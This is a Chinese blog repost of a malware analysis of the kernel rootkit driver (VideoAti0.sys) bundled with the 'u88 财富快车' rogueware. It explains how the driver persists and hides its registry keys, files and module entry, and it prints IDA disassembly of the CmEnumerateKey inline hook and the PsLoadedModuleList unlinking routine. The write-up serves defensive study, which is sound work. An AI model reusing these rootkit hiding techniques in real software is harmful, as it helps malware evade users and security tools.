u88财富快车流氓软件RK驱动分析
来源:互联网 发布:郭敬明整容 知乎 编辑:程序博客网 时间:2024/04/30 00:20
BY mj0011
u88财富快车流氓软件RK驱动分析
RK部分一共三个文件
VideoAti0.sys
VideoAti0.dll
VideoAti0.exe
驱动部分是BOOT0的,主要干了这么些事:
1.建立CreateProcessNotifyRoutine,检测到userinit.exe加载后就修改注册Run项目,以启动VideoAti0.exe,VideoAtio0.exe启动后会删除自己的RUN项目,并注入VideoAti0.dll,导致启动后无法发现其启动项目
2.Hook CmEnumerateKey,隐藏VedioAti0.sys的服务项,Is,gmer,rku等无法检测到
通过CreatePrcoessNotifyRoutine检测到是如下进程调用CmEnumerateKey时,会恢复自己的HOOK,企图蒙混过关:D
fhs.exe,knlsc13.exe
3.Hook FSD Dispatch Routine,Hook了/FileSystem/Ntfs,和/FileSystem/FastFat的IRP_MJ_CREATE和IRP_MJ_DIRECTORY_FILE,根据默认规则库会首先过滤
VideoAti0.sys
VideoAti0.dll
VideoAti0.exe
无法列出他们
规则库还可以通过R3向R0添加
4.从PsLoadMoudleList移除了自身,使得IS,gmer等工具无法检测到它,gmer可检测到 FSD HOOK,也检测不到是哪个module作了HOOK
后来R3的规则好象很BT,系统登陆后加载任何位置的driver都会失败:D
分析后的idb文件见压缩包,和读源代码没什么区别了
摘点代码
.text:000112D4 NewCMEnumerateKey proc near ; DATA XREF: ReadyHardCodeAndHook+1DBo
.text:000112D4 ; NewCMEnumerateKey+14Co
.text:000112D4
.text:000112D4 var_24 = byte ptr -24h
.text:000112D4 NewIrql = byte ptr -1
.text:000112D4 arg_0 = dword ptr 8
.text:000112D4 arg_4 = dword ptr 0Ch
.text:000112D4 arg_8 = dword ptr 10h
.text:000112D4 arg_C = dword ptr 14h
.text:000112D4 arg_10 = dword ptr 18h
.text:000112D4 arg_14 = dword ptr 1Ch
.text:000112D4
.text:000112D4 push ebp
.text:000112D5 mov ebp, esp
.text:000112D7 sub esp, 24h
.text:000112DA push ebx
.text:000112DB push esi
.text:000112DC push edi
.text:000112DD call ds:KeRaiseIrqlToDpcLevel
.text:000112E3 mov [ebp+NewIrql], al
.text:000112E6 call WP_OFF
.text:000112E6
.text:000112EB pushf
.text:000112EC pusha
.text:000112ED lea esi, unk_14390
.text:000112F3 mov edi, CmEnumerateKeyAddress
.text:000112F9 mov ecx, 6
.text:000112FE cld
.text:000112FF rep movsb
.text:00011301 popa
.text:00011302 popf
.text:00011303 call WP_ON
.text:00011303
.text:00011308 mov cl, [ebp+NewIrql] ; NewIrql
.text:0001130B call ds:KfLowerIrql
.text:00011311 push [ebp+arg_14]
.text:00011314 mov ebx, [ebp+arg_C]
.text:00011317 mov esi, [ebp+arg_4]
.text:0001131A push [ebp+arg_10]
.text:0001131D add esi, dword_14374
.text:00011323 push ebx
.text:00011324 push [ebp+arg_8]
.text:00011327 push esi
.text:00011328 push [ebp+arg_0]
.text:0001132B call OldcmEnumerateKey
.text:00011331 test eax, eax
.text:00011333 mov [ebp+arg_4], eax
.text:00011336 jge short loc_11342
.text:00011336
.text:00011338 cmp eax, 8000001Ah
.text:0001133D jmp loc_113FF
.text:0001133D
.text:00011342 ; ---------------------------------------------------------------------------
.text:00011342
.text:00011342 loc_11342: ; CODE XREF: NewCMEnumerateKey+62j
.text:00011342 lea eax, [ebp+var_24]
.text:00011345 push eax ; char *
.text:00011346 call GetCurrentCallProcess
.text:00011346
.text:0001134B mov edi, ds:_stricmp
.text:00011351 lea eax, [ebp+var_24]
.text:00011354 push offset s_Fhs_exe ; "fhs.exe"
.text:00011359 push eax ; char *
.text:0001135A call edi ; _stricmp
.text:0001135C pop ecx
.text:0001135D test eax, eax
.text:0001135F pop ecx
.text:00011360 jnz short loc_1136D
.text:00011360
.text:00011362 lea eax, [ebp+var_24]
.text:00011365 push eax
.text:00011366 push offset s_ProcessnameS ; "ProcessName:%S/n"
.text:0001136B jmp short loc_11387
.text:0001136B
.text:0001136D ; ---------------------------------------------------------------------------
.text:0001136D
.text:0001136D loc_1136D: ; CODE XREF: NewCMEnumerateKey+8Cj
.text:0001136D lea eax, [ebp+var_24]
.text:00011370 push offset s_Knlsc13_exe ; "knlsc13.exe"
.text:00011375 push eax ; char *
.text:00011376 call edi ; _stricmp
.text:00011378 pop ecx
.text:00011379 test eax, eax
.text:0001137B pop ecx
.text:0001137C jnz short loc_11390
.text:0001137C
.text:0001137E lea eax, [ebp+var_24]
.text:00011381 push eax
.text:00011382 push offset s_Processname_0 ; "ProcessName:%S/n"
.text:00011382
.text:00011387
.text:00011387 loc_11387: ; CODE XREF: NewCMEnumerateKey+97j
.text:00011387 call DbgPrint
.text:00011387
.text:0001138C pop ecx
.text:0001138D pop ecx
.text:0001138E jmp short StopHook
.text:0001138E
.text:00011390 ; ---------------------------------------------------------------------------
.text:00011390
.text:00011390 loc_11390: ; CODE XREF: NewCMEnumerateKey+A8j
.text:00011390 mov edi, dword_1439C
.text:00011390
.text:00011396
.text:00011396 loc_11396: ; CODE XREF: NewCMEnumerateKey+EFj
.text:00011396 cmp edi, offset HideReg
.text:0001139C jz short StopHook
.text:0001139C
.text:0001139E test edi, edi
.text:000113A0 jz short StopHook
.text:000113A0
.text:000113A2 push dword ptr [edi-8] ; wchar_t *
.text:000113A5 call ds:wcslen
.text:000113AB push eax ; size_t
.text:000113AC lea eax, [ebx+10h]
.text:000113AF push eax ; wchar_t *
.text:000113B0 push dword ptr [edi-8] ; wchar_t *
.text:000113B3 call ds:_wcsnicmp
.text:000113B9 add esp, 10h
.text:000113BC test eax, eax
.text:000113BE jz short loc_113C5
.text:000113BE
.text:000113C0 mov edi, [edi+4]
.text:000113C3 jmp short loc_11396
.text:000113C3
.text:000113C5 ; ---------------------------------------------------------------------------
.text:000113C5
.text:000113C5 loc_113C5: ; CODE XREF: NewCMEnumerateKey+EAj
.text:000113C5 push dword ptr [edi-8]
.text:000113C8 push offset s_FoundHideregS ; "Found HideReg:%S/n"
.text:000113CD call DbgPrint
.text:000113CD
.text:000113D2 pop ecx
.text:000113D3 inc esi
.text:000113D4 pop ecx
.text:000113D5 mov dword_14374, 1
.text:000113DF push [ebp+arg_14]
.text:000113E2 push [ebp+arg_10]
.text:000113E5 push ebx
.text:000113E6 push [ebp+arg_8]
.text:000113E9 push esi
.text:000113EA push [ebp+arg_0]
.text:000113ED call OldcmEnumerateKey
.text:000113F3 test eax, eax
.text:000113F5 mov [ebp+arg_4], eax
.text:000113F8 jge short StopHook
.text:000113F8
.text:000113FA cmp eax, 8000001Ah
.text:000113FA
.text:000113FF
.text:000113FF loc_113FF: ; CODE XREF: NewCMEnumerateKey+69j
.text:000113FF jnz short StopHook
.text:000113FF
.text:00011401 and dword_14374, 0
.text:00011401
.text:00011408
.text:00011408 StopHook: ; CODE XREF: NewCMEnumerateKey+BAj
.text:00011408 ; NewCMEnumerateKey+C8j
.text:00011408 ; NewCMEnumerateKey+CCj
.text:00011408 ; NewCMEnumerateKey+124j
.text:00011408 ; NewCMEnumerateKey:loc_113FFj
.text:00011408 call ds:KeRaiseIrqlToDpcLevel
.text:0001140E mov [ebp+NewIrql], al
.text:00011411 call WP_OFF
.text:00011411
.text:00011416 pusha
.text:00011417 mov edi, CmEnumerateKeyAddress
.text:0001141D mov al, 68h
.text:0001141F stosb
.text:00011420 lea eax, NewCMEnumerateKey
.text:00011426 stosd
.text:00011427 mov al, 0C3h
.text:00011429 stosb
.text:0001142A popa
.text:0001142B call WP_ON
.text:0001142B
.text:00011430 mov cl, [ebp+NewIrql] ; NewIrql
.text:00011433 call ds:KfLowerIrql
.text:00011439 mov eax, [ebp+arg_4]
.text:0001143C pop edi
.text:0001143D pop esi
.text:0001143E pop ebx
.text:0001143F leave
.text:00011440 retn 18h
.text:00011440
.text:00011440 NewCMEnumerateKey endp
.text:00011794 RemoveMyselfFormPsLoadModuleLIst proc near ; CODE XREF: start:loc_1049Fp
.text:00011794
.text:00011794 var_208 = word ptr -208h
.text:00011794
.text:00011794 push ebp
.text:00011795 mov ebp, esp
.text:00011797 sub esp, 208h
.text:0001179D and [ebp+var_208], 0
.text:000117A5 push esi
.text:000117A6 push edi
.text:000117A7 mov ecx, 81h
.text:000117AC xor eax, eax
.text:000117AE lea edi, [ebp-206h]
.text:000117B4 rep stosd
.text:000117B6 stosw
.text:000117B8 mov eax, PsLoadedModuleList
.text:000117BD mov edi, [eax]
.text:000117BF mov esi, edi
.text:000117BF
.text:000117C1
.text:000117C1 loc_117C1: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+88j
.text:000117C1 cmp dword ptr [esi+20h], 0
.text:000117C5 jz short loc_11816
.text:000117C5
.text:000117C7 push dword ptr [esi+28h] ; VirtualAddress
.text:000117CA call ds:MmIsAddressValid
.text:000117D0 test al, al
.text:000117D2 jz short loc_11816
.text:000117D2
.text:000117D4 mov eax, [esi+28h]
.text:000117D7 test eax, eax
.text:000117D9 jz short loc_11816
.text:000117D9
.text:000117DB movzx ecx, word ptr [esi+24h]
.text:000117DF shr ecx, 1
.text:000117E1 push ecx ; size_t
.text:000117E2 push eax ; wchar_t *
.text:000117E3 lea eax, [ebp+var_208]
.text:000117E9 push eax ; wchar_t *
.text:000117EA call ds:wcsncpy
.text:000117F0 lea eax, [ebp+var_208]
.text:000117F6 push eax ; wchar_t *
.text:000117F7 call ds:_wcslwr
.text:000117FD lea eax, [ebp+var_208]
.text:00011803 push offset s_Videoati0 ; "videoati0"
.text:00011808 push eax ; wchar_t *
.text:00011809 call ds:wcsstr
.text:0001180F add esp, 18h
.text:00011812 test eax, eax
.text:00011814 jnz short loc_1181E
.text:00011814
.text:00011816
.text:00011816 loc_11816: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+31j
.text:00011816 ; RemoveMyselfFormPsLoadModuleLIst+3Ej
.text:00011816 ; RemoveMyselfFormPsLoadModuleLIst+45j
.text:00011816 mov esi, [esi]
.text:00011818 cmp esi, edi
.text:0001181A jz short loc_11828
.text:0001181A
.text:0001181C jmp short loc_117C1
.text:0001181C
.text:0001181E ; ---------------------------------------------------------------------------
.text:0001181E
.text:0001181E loc_1181E: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+80j
.text:0001181E mov eax, [esi]
.text:00011820 mov esi, [esi+4]
.text:00011823 mov [eax+4], esi
.text:00011826 mov [esi], eax
.text:00011826
.text:00011828
.text:00011828 loc_11828: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+86j
.text:00011828 pop edi
.text:00011829 pop esi
.text:0001182A leave
.text:0001182B retn
.text:0001182B
.text:0001182B RemoveMyselfFormPsLoadModuleLIst endp
- u88财富快车流氓软件RK驱动分析
- u88财富快车流氓软件RK驱动分析
- (莱昂氏unix源代码分析导读-32) RK磁盘驱动
- 流氓软件分析
- RK驱动小结
- 流氓软件及反流氓软件的技术分析(转自驱动开发网)
- 财富快车中的几个比较有用的逆向代码
- 我为何坐不上财富快车 四招助你快速赚钱
- 流氓软件及反流氓软件的技术分析
- 流氓软件及反流氓软件的技术分析
- 流氓软件及反流氓软件的技术分析
- 流氓软件及反流氓软件的技术分析
- 流氓软件及反流氓软件的技术分析
- 流氓软件及反流氓软件的技术分析
- 流氓软件及反流氓软件的技术分析
- 流氓软件及反流氓软件的技术分析
- RK
- *RK
- Java 学习之道
- JAVA高手的成长历程
- Java程序的编码规范(1)
- JAVA编程规范总结
- 记住这些,你的鼠标就可以扔掉了
- u88财富快车流氓软件RK驱动分析
- 突破IceSword自身的进程保护
- 发两句牢骚
- 进程间的同步和互斥
- ERP标准流程
- ERP管理人员观念
- ERP系统维护工作浅谈
- 中国企业实施ERP之难点全攻略
- 如何选择ERP实施方